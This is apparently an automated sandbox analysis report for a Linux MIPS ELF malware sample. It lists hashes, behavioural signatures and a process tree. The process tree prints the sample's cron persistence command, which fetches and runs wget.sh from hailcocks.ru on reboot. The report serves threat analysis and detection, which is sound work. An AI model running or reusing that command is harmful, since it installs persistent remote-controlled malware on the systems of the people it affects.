Analysis

  • max time kernel
    151s
  • max time network
    142s
  • platform
    debian-12_mipsel
  • resource
    debian12-mipsel-20240221-en
  • resource tags

    arch:mipselimage:debian12-mipsel-20240221-enkernel:6.1.0-17-4kc-maltalocale:en-usos:debian-12-mipselsystem
  • submitted
    27-10-2024 02:54

General

  • Target

    cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf

  • Size

    87KB

  • MD5

    353a49ca2c9b8b35fb036b2de1587fc4

  • SHA1

    e5cd1ab8dc2c224a5b82113a41ec46479895ae27

  • SHA256

    cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3

  • SHA512

    8a47f0d0a8899d153cf80d5579d7ca8f81b9efe9daf93a2f60f72d5ad1ed77a360f3ff6f93cad6b016a52ec6a6f76b94bf2d427f6d9eda0bc5f7cf609e6fd484

  • SSDEEP

    1536:GJTjy914iDyIV6n30taWKqlpbfc/SLuZ++5+BJoK+mcS/:GJTj614NNczc/0ublmx

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 19 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
    /tmp/cee029b1438797b749a740be099fa82cffbbaa7a7507476f995c95a2d35a23d3.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:744
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:746
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        PID:750
      • /usr/bin/crontab
        crontab -l
        3⤵
          PID:751

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • /var/spool/cron/crontabs/tmp.wB9D8g

      Filesize

      306B

      MD5

      bfd2089040b748f688b70470021d4d43

      SHA1

      c2a6fac8ce436a014bb4149d14d7853259b9323c

      SHA256

      cfb81f43363ede429f69a6c15d63fbfdb87246bd92fc6a55a189c1001bfb4b3b

      SHA512

      4aee0c647992fff8bc38624556617e8b78523f37f9169ecc32dbc303821881cf90f1fdccc9add3cfc06b6089a8f8e17878173f132a16db77cb152869c2ea487e